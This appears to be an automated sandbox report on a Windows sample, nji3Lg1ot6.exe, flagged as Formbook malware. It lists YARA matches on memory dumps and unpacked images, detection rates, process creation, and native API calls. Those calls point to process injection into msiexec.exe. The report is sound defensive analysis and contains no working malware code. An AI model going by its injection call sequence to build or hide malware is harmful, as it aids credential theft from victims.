Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: nji3Lg1ot6.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: String function: 00A2B150 appears 72 times
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: String function: 046AB150 appears 72 times
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_0041A350 NtCreateFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_0041A400 NtReadFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_0041A480 NtClose,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_0041A34A NtCreateFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_0041A3FB NtReadFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_0041A47B NtClose,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A6B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A699D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69A10 NtQuerySection,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A6A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A695F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A6AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69560 NtWriteFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A696D0 NtCreateKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 1_2_00A69730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 7_2_046E9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA350 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA400 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA480 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA34A NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA3FB NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA47B NtClose,
          Source: nji3Lg1ot6.exe, 00000000.00000003.290866251.000000000333F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000000.00000003.291883164.00000000031A6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345282700.0000000000CAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345433443.0000000000EAF000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs nji3Lg1ot6.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: nji3Lg1ot6.exeVirustotal: Detection: 37%
          Source: nji3Lg1ot6.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile read: C:\Users\user\Desktop\nji3Lg1ot6.exeJump to behavior
          Source: nji3Lg1ot6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
